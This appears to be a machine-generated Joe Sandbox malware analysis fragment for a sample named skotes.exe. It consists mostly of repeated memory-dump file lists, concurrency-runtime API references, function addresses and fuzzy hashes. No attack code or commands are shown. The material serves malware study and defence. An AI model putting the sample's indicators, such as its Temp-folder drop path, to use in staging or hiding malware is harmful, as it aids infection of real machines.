                                                                                                                                              • Associated: 00000005.00000002.3318308078.00000000005F4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3319126701.00000000005F5000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3320324855.00000000005F6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3322091817.0000000000607000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3323116364.0000000000608000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3325761739.000000000061E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3327109512.000000000061F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3327712369.0000000000627000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3328341039.0000000000630000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3329760768.0000000000654000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3334212055.000000000065E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3336247440.000000000065F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3337715504.0000000000662000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3338866773.0000000000669000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3340778400.000000000066A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3341774303.0000000000671000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3342394644.0000000000673000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3342875922.000000000067B000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3344228340.000000000067F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3344851185.0000000000680000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3346052698.0000000000681000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3346881863.0000000000682000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3347843501.0000000000683000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3348907952.0000000000684000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3349537922.000000000068C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3349537922.00000000006CA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3351570636.00000000006F4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3352270174.00000000006F5000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353013061.00000000006F6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353390429.00000000006FB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353567936.00000000006FD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353855620.000000000070B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353897524.000000000070C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353939926.000000000070D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353978674.000000000070E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_skotes.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: 6C$C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                              • API String ID: 0-1188627148
                                                                                                                                              • Opcode ID: 3c2d1bade516e9138db386ecb82b66714fdcc0b789f94945d0f8f753bd50372f
                                                                                                                                              • Instruction ID: 1250e2cc5c3fce4557554197dcf76aeb845fef7d14ba199ebdc59f2273e001e9
                                                                                                                                              • Opcode Fuzzy Hash: 3c2d1bade516e9138db386ecb82b66714fdcc0b789f94945d0f8f753bd50372f
                                                                                                                                              • Instruction Fuzzy Hash: 5C21D37160521DBF9B38AE679C80F2B77BDEF08368F10551AF91492282E768EC009769
                                                                                                                                              Function 0042AE65 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 80COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • List.LIBCONCRT ref: 0042AEEA
                                                                                                                                              • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0042AF0F
                                                                                                                                              • Concurrency::details::FreeVirtualProcessorRoot::FreeVirtualProcessorRoot.LIBCONCRT ref: 0042AF4E
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000005.00000002.3295638397.0000000000400000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3295768977.0000000000462000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3296575174.0000000000469000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3300137664.000000000046B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3301567083.0000000000475000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3302714861.0000000000476000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3303512985.0000000000477000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3310859878.00000000005D0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3311580448.00000000005D2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3311981718.00000000005E0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3313837108.00000000005E1000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3314182028.00000000005E4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3314182028.00000000005EC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3315473059.00000000005F0000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3316471148.00000000005F1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3317503573.00000000005F2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3318308078.00000000005F4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3319126701.00000000005F5000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3320324855.00000000005F6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3322091817.0000000000607000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3323116364.0000000000608000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3325761739.000000000061E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3327109512.000000000061F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3327712369.0000000000627000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3328341039.0000000000630000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3329760768.0000000000654000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3334212055.000000000065E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3336247440.000000000065F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3337715504.0000000000662000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3338866773.0000000000669000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3340778400.000000000066A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3341774303.0000000000671000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3342394644.0000000000673000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3342875922.000000000067B000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3344228340.000000000067F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3344851185.0000000000680000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3346052698.0000000000681000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3346881863.0000000000682000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3347843501.0000000000683000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3348907952.0000000000684000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3349537922.000000000068C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3349537922.00000000006CA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3351570636.00000000006F4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3352270174.00000000006F5000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353013061.00000000006F6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353390429.00000000006FB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353567936.00000000006FD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353855620.000000000070B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353897524.000000000070C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353939926.000000000070D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353978674.000000000070E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_skotes.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FreeProcessorVirtual$Concurrency::details::ListRootRoot::std::invalid_argument::invalid_argument
                                                                                                                                              • String ID: pExecutionResource
                                                                                                                                              • API String ID: 1772865662-359481074
                                                                                                                                              • Opcode ID: 8757b6f0ebfc55abe5b247c9d13e7f834f3e243f6a5ed22403078c9b1f0b1de5
                                                                                                                                              • Instruction ID: fa6d3a0e3725f8ef027d180f71de552ac3c936f12b730e52bc2201ef4983df17
                                                                                                                                              • Opcode Fuzzy Hash: 8757b6f0ebfc55abe5b247c9d13e7f834f3e243f6a5ed22403078c9b1f0b1de5
                                                                                                                                              • Instruction Fuzzy Hash: 9A21A9B5B403059BCB04EF55C882BED77A5BF48314F50405FE90167382DB78AE55CB99
                                                                                                                                              Function 00424EA2 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 74COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00424F24
                                                                                                                                              • Concurrency::details::CacheLocalScheduleGroupSegment::CacheLocalScheduleGroupSegment.LIBCONCRT ref: 00424F66
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000005.00000002.3295638397.0000000000400000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3295768977.0000000000462000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3296575174.0000000000469000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3300137664.000000000046B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3301567083.0000000000475000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3302714861.0000000000476000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3303512985.0000000000477000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3310859878.00000000005D0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3311580448.00000000005D2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3311981718.00000000005E0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3313837108.00000000005E1000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3314182028.00000000005E4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3314182028.00000000005EC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3315473059.00000000005F0000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3316471148.00000000005F1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3317503573.00000000005F2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3318308078.00000000005F4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3319126701.00000000005F5000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3320324855.00000000005F6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3322091817.0000000000607000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3323116364.0000000000608000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3325761739.000000000061E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3327109512.000000000061F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3327712369.0000000000627000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3328341039.0000000000630000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3329760768.0000000000654000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3334212055.000000000065E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3336247440.000000000065F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3337715504.0000000000662000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3338866773.0000000000669000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3340778400.000000000066A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3341774303.0000000000671000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3342394644.0000000000673000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3342875922.000000000067B000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3344228340.000000000067F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3344851185.0000000000680000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3346052698.0000000000681000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3346881863.0000000000682000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3347843501.0000000000683000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3348907952.0000000000684000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3349537922.000000000068C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3349537922.00000000006CA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3351570636.00000000006F4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3352270174.00000000006F5000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353013061.00000000006F6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353390429.00000000006FB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353567936.00000000006FD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353855620.000000000070B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353897524.000000000070C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353939926.000000000070D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353978674.000000000070E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_skotes.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CacheGroupLocalSchedule$Concurrency::details::SegmentSegment::std::invalid_argument::invalid_argument
                                                                                                                                              • String ID: count$ppVirtualProcessorRoots
                                                                                                                                              • API String ID: 2663199487-3650809737
                                                                                                                                              • Opcode ID: 13447b8e231ac65c24fe41b3ecebc36d2f88b520589b9f8e03cb52c67cf159fb
                                                                                                                                              • Instruction ID: 0fe100e528eb00baa15785fa13c2d5db46de6353967fcf2c4de188508199a33a
                                                                                                                                              • Opcode Fuzzy Hash: 13447b8e231ac65c24fe41b3ecebc36d2f88b520589b9f8e03cb52c67cf159fb
                                                                                                                                              • Instruction Fuzzy Hash: 43210034B00224EFCB04EF99D881EAD73A0FF88315F40406FE40697692CB74AE01CB58
                                                                                                                                              Function 0042B975 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 64COMMONLIBRARYCODE
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0042BA0E
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000005.00000002.3295638397.0000000000400000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3295768977.0000000000462000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3296575174.0000000000469000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3300137664.000000000046B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3301567083.0000000000475000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3302714861.0000000000476000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3303512985.0000000000477000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3310859878.00000000005D0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3311580448.00000000005D2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3311981718.00000000005E0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3313837108.00000000005E1000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3314182028.00000000005E4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3314182028.00000000005EC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3315473059.00000000005F0000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3316471148.00000000005F1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3317503573.00000000005F2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3318308078.00000000005F4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3319126701.00000000005F5000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3320324855.00000000005F6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3322091817.0000000000607000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3323116364.0000000000608000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3325761739.000000000061E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3327109512.000000000061F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3327712369.0000000000627000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3328341039.0000000000630000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3329760768.0000000000654000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3334212055.000000000065E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3336247440.000000000065F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3337715504.0000000000662000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3338866773.0000000000669000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3340778400.000000000066A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3341774303.0000000000671000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3342394644.0000000000673000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3342875922.000000000067B000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3344228340.000000000067F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3344851185.0000000000680000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3346052698.0000000000681000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3346881863.0000000000682000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3347843501.0000000000683000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3348907952.0000000000684000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3349537922.000000000068C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3349537922.00000000006CA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3351570636.00000000006F4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3352270174.00000000006F5000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353013061.00000000006F6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353390429.00000000006FB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353567936.00000000006FD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353855620.000000000070B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353897524.000000000070C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353939926.000000000070D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353978674.000000000070E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_skotes.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error
                                                                                                                                              • String ID: RoInitialize$RoUninitialize$combase.dll
                                                                                                                                              • API String ID: 348560076-3997890769
                                                                                                                                              • Opcode ID: fb0354458ee7ba9049ff0ad3b1a1bbcc99ce6370e8f2c50a4853d107d9c629f5
                                                                                                                                              • Instruction ID: e921fb3065354ec6b7171669d5441cfe1ec30acbd2610ddc6c285c0b81b9a9f2
                                                                                                                                              • Opcode Fuzzy Hash: fb0354458ee7ba9049ff0ad3b1a1bbcc99ce6370e8f2c50a4853d107d9c629f5
                                                                                                                                              • Instruction Fuzzy Hash: A701F9616813215DE710B7B77C01BAB32DCDF0170DF60582BE940E3192EF6DE80456AE
                                                                                                                                              Function 00426E1C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • SafeRWList.LIBCONCRT ref: 00426E73
                                                                                                                                                • Part of subcall function 00424E6E: Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 00424E7F
                                                                                                                                                • Part of subcall function 00424E6E: List.LIBCMT ref: 00424E89
                                                                                                                                              • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00426E85
                                                                                                                                              • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00426EAA
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000005.00000002.3295638397.0000000000400000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3295768977.0000000000462000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3296575174.0000000000469000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3300137664.000000000046B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3301567083.0000000000475000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3302714861.0000000000476000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3303512985.0000000000477000.00000080.00000001.01000000.00000008.sdmpDownload File
